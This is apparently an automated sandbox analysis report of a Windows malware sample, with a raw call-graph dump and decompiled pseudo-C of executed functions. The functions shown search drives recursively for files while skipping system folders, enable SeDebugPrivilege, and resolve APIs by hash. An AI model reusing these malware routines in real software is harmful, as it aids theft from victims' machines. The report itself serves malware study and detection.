9049 4124f1 9040->9049 9042 4031e5 4 API calls 9042->9044 9044->9038 9045 412663 9047 4031e5 4 API calls 9045->9047 9046 4124f1 4 API calls 9046->9045 9047->9048 9048->9042 9050 4031e5 4 API calls 9049->9050 9051 412503 9050->9051 9051->9045 9051->9046 9238 4049dc 9239 4031e5 4 API calls 9238->9239 9240 4049ef 9239->9240 9895 40cddd 9896 405b6f 6 API calls 9895->9896 9897 40cdee 9896->9897 9898 40ce06 9897->9898 9899 413a58 13 API calls 9897->9899 9900 405b6f 6 API calls 9898->9900 9907 40ce59 9898->9907 9901 40ce00 9899->9901 9903 40ce1c 9900->9903 9902 402bab 2 API calls 9901->9902 9902->9898 9904 403d74 19 API calls 9903->9904 9903->9907 9909 40ce52 9903->9909 9906 40ce45 9904->9906 9905 402bab 2 API calls 9905->9907 9908 402bab 2 API calls 9906->9908 9906->9909 9908->9909 9909->9905 9241 40ecde 9242 412093 20 API calls 9241->9242 9243 40ecfd 9242->9243 9244 412093 20 API calls 9243->9244 9245 40ed0d 9244->9245 9249 40e8df 9250 412093 20 API calls 9249->9250 9251 40e8f8 9250->9251 9252 412093 20 API calls 9251->9252 9253 40e908 9252->9253 9260 404b22 9253->9260 9255 40e91c 9256 40e936 9255->9256 9259 40e93d 9255->9259 9267 40e944 9255->9267 9258 402bab 2 API calls 9256->9258 9258->9259 9261 402b7c 2 API calls 9260->9261 9262 404b33 9261->9262 9266 404b66 9262->9266 9276 4049b3 9262->9276 9265 402bab 2 API calls 9265->9266 9266->9255 9268 4056bf 2 API calls 9267->9268 9269 40e952 9268->9269 9270 40e976 9269->9270 9271 4057df 13 API calls 9269->9271 9270->9256 9272 40e966 9271->9272 9273 413aca 4 API calls 9272->9273 9274 40e970 9273->9274 9275 405695 2 API calls 9274->9275 9275->9270 9277 4031e5 4 API calls 9276->9277 9278 4049c6 9277->9278 9278->9265 9278->9266 9279 4139de 9288 413855 9279->9288 9281 4139f1 9282 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9281->9282 9283 4139f7 9282->9283 9284 413866 59 API calls 9283->9284 9285 413a2d 9284->9285 9286 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9285->9286 9287 413a34 9286->9287 9289 4031e5 4 API calls 9288->9289 9290 413864 9289->9290 9290->9290 9915 4116e7 9916 4117ba 9915->9916 9917 4117f1 9916->9917 9918 405b6f 6 API calls 9916->9918 9919 4117d0 9918->9919 9919->9917 9920 404cbf 8 API calls 9919->9920 9921 4117eb 9920->9921 9922 402bab 2 API calls 9921->9922 9922->9917 9310 4094e7 9311 404b22 6 API calls 9310->9311 9312 4094fe 9311->9312 9313 409554 9312->9313 9314 405b6f 6 API calls 9312->9314 9315 409514 9314->9315 9317 404b22 6 API calls 9315->9317 9322 40954d 9315->9322 9316 402bab 2 API calls 9316->9313 9318 40952d 9317->9318 9319 409408 15 API calls 9318->9319 9324 409544 9318->9324 9321 40953e 9319->9321 9320 402bab 2 API calls 9320->9322 9323 402bab 2 API calls 9321->9323 9322->9316 9323->9324 9324->9320 9333 4058ea 9334 4031e5 4 API calls 9333->9334 9335 4058fd StrStrA 9334->9335 9967 40d4ea 9968 404bee 6 API calls 9967->9968 9969 40d500 9968->9969 9970 40d5a0 9969->9970 9971 404bee 6 API calls 9969->9971 9972 40d529 9971->9972 9973 404bee 6 API calls 9972->9973 9974 40d537 9973->9974 9975 404bee 6 API calls 9974->9975 9976 40d546 9975->9976 9976->9970 9977 405872 4 API calls 9976->9977 9978 40d56d 9977->9978 9979 405872 4 API calls 9978->9979 9980 40d57c 9979->9980 9981 405872 4 API calls 9980->9981 9982 40d58e 9981->9982 9983 405872 4 API calls 9982->9983 9983->9970 9984 40a3ea 9985 40374e 6 API calls 9984->9985 9986 40a403 9985->9986 9987 40a419 9986->9987 9988 4059d8 4 API calls 9986->9988 9989 40a411 9988->9989 9990 402bab 2 API calls 9989->9990 9990->9987 9373 404df3 WSAStartup 9377 4091f6 9378 404b22 6 API calls 9377->9378 9379 40920b 9378->9379 9380 409222 9379->9380 9381 409408 15 API calls 9379->9381 9382 40921c 9381->9382 9383 402bab 2 API calls 9382->9383 9383->9380 10017 4117fe 10018 404c4e 6 API calls 10017->10018 10019 411888 10018->10019 10020 404c4e 6 API calls 10019->10020 10022 411925 10019->10022 10021 4118ab 10020->10021 10021->10022 10036 4119b3 10021->10036 10024 4118c5 10025 4119b3 4 API calls 10024->10025 10026 4118d0 10025->10026 10026->10022 10027 4056bf 2 API calls 10026->10027 10028 4118fd 10027->10028 10029 405872 4 API calls 10028->10029 10030 41190a 10029->10030 10031 405872 4 API calls 10030->10031 10032 411915 10031->10032 10033 413aca 4 API calls 10032->10033 10034 41191f 10033->10034 10035 405695 2 API calls 10034->10035 10035->10022 10037 4119c6 10036->10037 10039 4119bf 10036->10039 10038 4031e5 4 API calls 10037->10038 10038->10039 10039->10024 9387 40e880 9388 41219c 14 API calls 9387->9388 9389 40e88e 9388->9389 9390 41219c 14 API calls 9389->9390 9391 40e89c 9390->9391 10103 40e48a 10104 404bee 6 API calls 10103->10104 10106 40e4d0 10104->10106 10105 40e4f4 10106->10105 10107 405872 4 API calls 10106->10107 10107->10105 9488 410390 9489 404b22 6 API calls 9488->9489 9490 4103a5 9489->9490 9491 410409 9490->9491 9492 405b6f 6 API calls 9490->9492 9496 4103ba 9492->9496 9493 410402 9494 402bab 2 API calls 9493->9494 9494->9491 9495 402bab 2 API calls 9495->9493 9496->9493 9497 403d74 19 API calls 9496->9497 9500 4103fb 9496->9500 9498 4103ee 9497->9498 9499 402bab 2 API calls 9498->9499 9498->9500 9499->9500 9500->9495 10118 40ed96 10119 4040bb 12 API calls 10118->10119 10133 40edb0 10119->10133 10120 40ef90 10121 40ef87 10122 403f9e 5 API calls 10121->10122 10122->10120 10123 405ae9 6 API calls 10123->10133 10124 412269 6 API calls 10124->10133 10125 40ef61 10127 40ef6e 10125->10127 10129 402bab 2 API calls 10125->10129 10126 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 10126->10133 10128 40ef7c 10127->10128 10130 402bab 2 API calls 10127->10130 10128->10121 10131 402bab 2 API calls 10128->10131 10129->10127 10130->10128 10131->10121 10132 402bab GetProcessHeap RtlFreeHeap 10132->10133 10133->10120 10133->10121 10133->10123 10133->10124 10133->10125 10133->10126 10133->10132 10134 40ef98 10135 404c4e 6 API calls 10134->10135 10136 40efb6 10135->10136 10137 40f02a 10136->10137 10149 40f054 10136->10149 10140 404bee 6 API calls 10141 40efda 10140->10141 10142 404bee 6 API calls 10141->10142 10143 40efe9 10142->10143 10143->10137 10144 405872 4 API calls 10143->10144 10145 40f008 10144->10145 10146 405872 4 API calls 10145->10146 10147 40f01a 10146->10147 10148 405872 4 API calls 10147->10148 10148->10137 10150 40f064 10149->10150 10151 402b7c 2 API calls 10150->10151 10153 40f072 10151->10153 10152 40efca 10152->10140 10153->10152 10155 405ecd 10153->10155 10156 4059b8 4 API calls 10155->10156 10157 405edf 10156->10157 10157->10153 9507 410c98 9508 41219c 14 API calls 9507->9508 9509 410ca8 9508->9509 9510 41219c 14 API calls 9509->9510 9511 410cb5 9510->9511 9512 412093 20 API calls 9511->9512 9513 410cc9 9512->9513 10227 41249c 10228 4056bf 2 API calls 10227->10228 10229 4124aa 10228->10229 10230 4057df 13 API calls 10229->10230 10235 4124ce 10229->10235 10231 4124be 10230->10231 10232 413aca 4 API calls 10231->10232 10233 4124c8 10232->10233 10234 405695 2 API calls 10233->10234 10234->10235 9517 40f49e 9518 40f4b6 13 API calls 9517->9518 9519 40f4a8 9518->9519 9520 40929e 9521 413b28 6 API calls 9520->9521 9522 4092a4 9521->9522 9523 405b6f 6 API calls 9522->9523 9524 4092af 9523->9524 9525 4092c5 9524->9525 9526 409408 15 API calls 9524->9526 9527 4092bf 9526->9527 9528 402bab 2 API calls 9527->9528 9528->9525 10254 407fa4 10255 407fb7 10254->10255 10256 402b7c 2 API calls 10255->10256 10258 407fee 10255->10258 10257 40800d 10256->10257 10257->10258 10259 4037be 4 API calls 10257->10259 10260 40803c 10259->10260 10261 402bab 2 API calls 10260->10261 10261->10258 9565 4090aa 9566 404b22 6 API calls 9565->9566 9567 4090c1 9566->9567 9568 4090d8 9567->9568 9569 409408 15 API calls 9567->9569 9570 404b22 6 API calls 9568->9570 9571 4090d2 9569->9571 9572 4090eb 9570->9572 9573 402bab 2 API calls 9571->9573 9574 408c4d 15 API calls 9572->9574 9577 409104 9572->9577 9573->9568 9575 4090fe 9574->9575 9576 402bab 2 API calls 9575->9576 9576->9577 9584 409cae 9599 404b79 9584->9599 9586 409cc5 9587 409d27 9586->9587 9588 405b6f 6 API calls 9586->9588 9590 409d2f 9586->9590 9589 402bab 2 API calls 9587->9589 9591 409cec 9588->9591 9589->9590 9591->9587 9592 404b79 6 API calls 9591->9592 9593 409d05 9592->9593 9594 409d1e 9593->9594 9595 408c4d 15 API calls 9593->9595 9596 402bab 2 API calls 9594->9596 9597 409d18 9595->9597 9596->9587 9598 402bab 2 API calls 9597->9598 9598->9594 9600 404b22 6 API calls 9599->9600 9601 404b8a 9600->9601 9601->9586 10321 411fb3 10322 405b6f 6 API calls 10321->10322 10324 412013 10322->10324 10323 412075 10324->10323 10339 41206a 10324->10339 10340 411a8d 10324->10340 10326 402bab 2 API calls 10326->10323 10328 4056bf 2 API calls 10329 41203d 10328->10329 10330 405872 4 API calls 10329->10330 10331 41204a 10330->10331 10332 413aca 4 API calls 10331->10332 10333 412054 10332->10333 10334 405695 2 API calls 10333->10334 10335 41205a 10334->10335 10336 413a58 13 API calls 10335->10336 10337 412064 10336->10337 10338 402bab 2 API calls 10337->10338 10338->10339 10339->10326 10341 402b7c 2 API calls 10340->10341 10342 411aa3 10341->10342 10350 411f05 10342->10350 10363 404ada 10342->10363 10345 404ada 4 API calls 10346 411cad 10345->10346 10347 411f0c 10346->10347 10348 411cc0 10346->10348 10349 402bab 2 API calls 10347->10349 10366 405eb6 10348->10366 10349->10350 10350->10328 10350->10339 10352 411d3c 10353 4031e5 4 API calls 10352->10353 10361 411d7b 10353->10361 10354 411ea6 10355 4031e5 4 API calls 10354->10355 10356 411eb5 10355->10356 10357 4031e5 4 API calls 10356->10357 10358 411ed6 10357->10358 10359 405eb6 4 API calls 10358->10359 10359->10350 10360 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10360->10361 10361->10354 10361->10360 10362 405eb6 4 API calls 10361->10362 10362->10361 10364 4031e5 4 API calls 10363->10364 10365 404afd 10364->10365 10365->10345 10367 405998 4 API calls 10366->10367 10368 405ec8 10367->10368 10368->10352 9631 40f6b8 9632 41219c 14 API calls 9631->9632 9633 40f6c7 9632->9633 9634 41219c 14 API calls 9633->9634 9635 40f6d5 9634->9635 9636 41219c 14 API calls 9635->9636 9637 40f6df 9636->9637 9656 40d6bd 9657 4056bf 2 API calls 9656->9657 9658 40d6c9 9657->9658 9669 404cbf 9658->9669 9661 404cbf 8 API calls 9662 40d6f4 9661->9662 9663 404cbf 8 API calls 9662->9663 9664 40d702 9663->9664 9665 413aca 4 API calls 9664->9665 9666 40d711 9665->9666 9667 405695 2 API calls 9666->9667 9668 40d71f 9667->9668 9670 402b7c 2 API calls 9669->9670 9671 404ccd 9670->9671 9672 404ddc 9671->9672 9673 404b8f 5 API calls 9671->9673 9672->9661 9674 404ce4 9673->9674 9675 404dd4 9674->9675 9677 402b7c 2 API calls 9674->9677 9676 402bab 2 API calls 9675->9676 9676->9672 9684 404d04 9677->9684 9678 404dcc 9679 404a39 5 API calls 9678->9679 9679->9675 9680 404dc6 9682 402bab 2 API calls 9680->9682 9681 402b7c 2 API calls 9681->9684 9682->9678 9683 404b8f 5 API calls 9683->9684 9684->9678 9684->9680 9684->9681 9684->9683 9685 402bab GetProcessHeap RtlFreeHeap 9684->9685 9686 404a39 5 API calls 9684->9686 9687 405b6f 6 API calls 9684->9687 9688 404cbf 8 API calls 9684->9688 9685->9684 9686->9684 9687->9684 9688->9684 9689 40f0bf 9690 4056bf 2 API calls 9689->9690 9691 40f0c9 9690->9691 9692 40f115 9691->9692 9694 404cbf 8 API calls 9691->9694 9693 41219c 14 API calls 9692->9693 9695 40f128 9693->9695 9696 40f0ed 9694->9696 9697 404cbf 8 API calls 9696->9697 9698 40f0fb 9697->9698 9699 413aca 4 API calls 9698->9699 9700 40f10a 9699->9700 9701 405695 2 API calls 9700->9701 9701->9692

                  Executed Functions

                  Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 141 403d74-403d90 call 4067c4 144 403d96-403da9 call 405b6f 141->144 145 403ea9-403ec0 call 405b6f 141->145 150 403ea6-403ea8 144->150 151 403daf-403dcb call 4031e5 FindFirstFileW 144->151 152 403f95 145->152 153 403ec6-403ee2 call 4031e5 FindFirstFileW 145->153 150->145 159 403dd1-403dd8 151->159 160 403e9d-403ea4 call 402bab 151->160 154 403f97-403f9d 152->154 161 403ee8-403ef8 call 405d24 153->161 162 403f8e-403f94 call 402bab 153->162 166 403e75-403e90 call 4031e5 FindNextFileW 159->166 167 403dde-403de2 159->167 160->150 175 403f03-403f0a 161->175 176 403efa-403f01 161->176 162->152 166->159 179 403e96-403e97 call 403bef 166->179 172 403e12-403e22 call 405d24 167->172 173 403de4-403df9 call 405eff 167->173 188 403e30-403e4c call 405b6f 172->188 189 403e24-403e2e 172->189 173->166 185 403dfb-403e10 call 405eff 173->185 181 403f12-403f2d call 405b6f 175->181 182 403f0c-403f10 175->182 176->175 180 403f41-403f5c call 4031e5 FindNextFileW 176->180 193 403e9c 179->193 196 403f87-403f88 call 403bef 180->196 197 403f5e-403f61 180->197 181->180 199 403f2f-403f33 181->199 182->180 182->181 185->166 185->172 188->166 203 403e4e-403e6f call 403d74 call 402bab 188->203 189->166 189->188 193->160 207 403f8d 196->207 197->161 201 403f75-403f85 call 402bab call 403bef 199->201 202 403f35-403f36 call 40fa23 199->202 201->154 209 403f39-403f40 call 402bab 202->209 203->166 217 403f63-403f73 call 402bab call 403bef 203->217 207->162 209->180 217->154
                  C-Code - Quality: 85%
                  			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				struct _WIN32_FIND_DATAW _v596;
				void* __ebx;
				void* _t35;
				int _t43;
				void* _t52;
				int _t56;
				intOrPtr _t60;
				void* _t66;
				void* _t73;
				void* _t74;
				WCHAR* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				WCHAR* _t102;
				void* _t103;
				void* _t104;

				L004067C4(0xa); // executed
				_t72 = 0;
				_t100 = 0x2e;
				_t106 = _a16;
				if(_a16 == 0) {
					L15:
					_push(_a8);
					_t98 = E00405B6F(0, L"%s\\%s", _a4);
					_t104 = _t103 + 0xc;
					if(_t98 == 0) {
						L30:
						__eflags = 0;
						return 0;
					}
					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
					_t35 = FindFirstFileW(_t98,  &_v596); // executed
					_t73 = _t35;
					if(_t73 == 0xffffffff) {
						L29:
						E00402BAB(_t98);
						goto L30;
					}
					L17:
					while(1) {
						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
							if(_v596.dwFileAttributes != 0x10) {
								L21:
								_push( &(_v596.cFileName));
								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
								_t104 = _t104 + 0xc;
								if(_t101 == 0) {
									goto L24;
								}
								if(_a12 == 0) {
									E00402BAB(_t98);
									E00403BEF(_t73);
									return _t101;
								}
								_a12(_t101);
								E00402BAB(_t101);
								goto L24;
							}
							_t124 = _a20;
							if(_a20 == 0) {
								goto L24;
							}
							goto L21;
						} else {
							L24:
							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
							_t43 = FindNextFileW(_t73,  &_v596); // executed
							if(_t43 == 0) {
								E00403BEF(_t73); // executed
								goto L29;
							}
							_t100 = 0x2e;
							continue;
						}
					}
				}
				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
				if(_t102 == 0) {
					L14:
					_t100 = 0x2e;
					goto L15;
				}
				E004031E5(0, 0, 0xd4f4acea, 0, 0);
				_t52 = FindFirstFileW(_t102,  &_v596); // executed
				_t74 = _t52;
				if(_t74 == 0xffffffff) {
					L13:
					E00402BAB(_t102);
					_t72 = 0;
					goto L14;
				} else {
					goto L3;
				}
				do {
					L3:
					if((_v596.dwFileAttributes & 0x00000010) == 0) {
						goto L11;
					}
					if(_a24 == 0) {
						L7:
						if(E00405D24( &(_v596.cFileName)) >= 3) {
							L9:
							_push( &(_v596.cFileName));
							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
							_t103 = _t103 + 0xc;
							_a16 = _t60;
							_t115 = _t60;
							if(_t60 == 0) {
								goto L11;
							}
							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
							E00402BAB(_a16);
							_t103 = _t103 + 0x1c;
							if(_t99 != 0) {
								E00402BAB(_t102);
								E00403BEF(_t74);
								return _t99;
							}
							goto L11;
						}
						_t66 = 0x2e;
						_t114 = _v596.cFileName - _t66;
						if(_v596.cFileName == _t66) {
							goto L11;
						}
						goto L9;
					}
					_push(L"Windows");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					_push(L"Program Files");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					goto L7;
					L11:
					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
					_t56 = FindNextFileW(_t74,  &_v596); // executed
				} while (_t56 != 0);
				E00403BEF(_t74); // executed
				goto L13;
			}




















                  0x00403d82
                  0x00403d88
                  0x00403d8c
                  0x00403d8d
                  0x00403d90
                  0x00403ea9
                  0x00403ea9
                  0x00403eb9
                  0x00403ebb
                  0x00403ec0
                  0x00403f95
                  0x00403f95
                  0x00000000
                  0x00403f95
                  0x00403ece
                  0x00403edb
                  0x00403edd
                  0x00403ee2
                  0x00403f8e
                  0x00403f8f
                  0x00000000
                  0x00403f94
                  0x00000000
                  0x00403ee8
                  0x00403ef8
                  0x00403f0a
                  0x00403f12
                  0x00403f18
                  0x00403f26
                  0x00403f28
                  0x00403f2d
                  0x00000000
                  0x00000000
                  0x00403f33
                  0x00403f76
                  0x00403f7c
                  0x00000000
                  0x00403f83
                  0x00403f36
                  0x00403f3a
                  0x00000000
                  0x00403f40
                  0x00403f0c
                  0x00403f10
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403f41
                  0x00403f41
                  0x00403f4b
                  0x00403f58
                  0x00403f5c
                  0x00403f88
                  0x00000000
                  0x00403f8d
                  0x00403f60
                  0x00000000
                  0x00403f60
                  0x00403ef8
                  0x00403ee8
                  0x00403da3
                  0x00403da9
                  0x00403ea6
                  0x00403ea8
                  0x00000000
                  0x00403ea8
                  0x00403db7
                  0x00403dc4
                  0x00403dc6
                  0x00403dcb
                  0x00403e9d
                  0x00403e9e
                  0x00403ea4
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403dd1
                  0x00403dd1
                  0x00403dd8
                  0x00000000
                  0x00000000
                  0x00403de2
                  0x00403e12
                  0x00403e22
                  0x00403e30
                  0x00403e36
                  0x00403e3f
                  0x00403e44
                  0x00403e47
                  0x00403e4a
                  0x00403e4c
                  0x00000000
                  0x00000000
                  0x00403e63
                  0x00403e65
                  0x00403e6a
                  0x00403e6f
                  0x00403f64
                  0x00403f6a
                  0x00000000
                  0x00403f71
                  0x00000000
                  0x00403e6f
                  0x00403e26
                  0x00403e27
                  0x00403e2e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403e2e
                  0x00403dea
                  0x00403df9
                  0x00000000
                  0x00000000
                  0x00403e01
                  0x00403e10
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403e75
                  0x00403e7f
                  0x00403e8c
                  0x00403e8e
                  0x00403e97
                  0x00000000

                  APIs
                  • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                  • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                  • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                  • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileFind$FirstNext
                  • String ID: %s\%s$%s\*$Program Files$Windows
                  • API String ID: 1690352074-2009209621
                  • Opcode ID: ad7c74b04f80a3f0505dab59ee52979237fa7b85e1783948606d5fbfbb722467
                  • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                  • Opcode Fuzzy Hash: ad7c74b04f80a3f0505dab59ee52979237fa7b85e1783948606d5fbfbb722467
                  • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                  Download Yara Rule
                  C-Code - Quality: 78%
                  			E0040650A(void* __eax, void* __ebx, void* __eflags) {
				void* _v8;
				struct _LUID _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v32;
				intOrPtr* _t13;
				void* _t14;
				int _t16;
				int _t31;
				void* _t32;

				_t31 = 0;
				E004060AC();
				_t32 = __eax;
				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
				_t14 =  *_t13(_t32, 0x28,  &_v8);
				if(_t14 != 0) {
					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
					if(_t16 != 0) {
						_push(__ebx);
						_v32.Privileges = _v16.LowPart;
						_v32.PrivilegeCount = 1;
						_v24 = _v16.HighPart;
						_v20 = 2;
						E004031E5(1, 9, 0xc1642df2, 0, 0);
						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
						_t31 =  !=  ? 1 : 0;
					}
					E00403C40(_v8);
					return _t31;
				}
				return _t14;
			}













                  0x00406512
                  0x00406514
                  0x00406522
                  0x00406524
                  0x00406530
                  0x00406534
                  0x0040653f
                  0x0040654e
                  0x00406552
                  0x0040655a
                  0x0040655f
                  0x0040656d
                  0x00406570
                  0x00406573
                  0x0040657a
                  0x00406589
                  0x0040658d
                  0x00406590
                  0x00406594
                  0x00000000
                  0x0040659a
                  0x004065a1

                  APIs
                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                  • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                  • String ID: SeDebugPrivilege
                  • API String ID: 3615134276-2896544425
                  • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                  • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                  • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                  • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00402B7C(long _a4) {
				void* _t4;
				void* _t7;

				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				_t7 = _t4;
				if(_t7 != 0) {
					E00402B4E(_t7, 0, _a4);
				}
				return _t7;
			}





                  0x00402b8c
                  0x00402b92
                  0x00402b96
                  0x00402b9e
                  0x00402ba3
                  0x00402baa

                  APIs
                  • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                  • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcess
                  • String ID:
                  • API String ID: 1357844191-0
                  • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                  • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                  • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                  • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00406069 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00406069(WCHAR* _a4, DWORD* _a8) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 9, 0xd4449184, 0, 0);
				_t4 = GetUserNameW(_a4, _a8); // executed
				return _t4;
			}





                  0x00406077
                  0x00406082
                  0x00406085

                  APIs
                  • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: NameUser
                  • String ID:
                  • API String ID: 2645101109-0
                  • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                  • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                  • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                  • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                  Download Yara Rule
                  APIs
                  • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: recv
                  • String ID:
                  • API String ID: 1507349165-0
                  • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                  • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                  • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                  • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
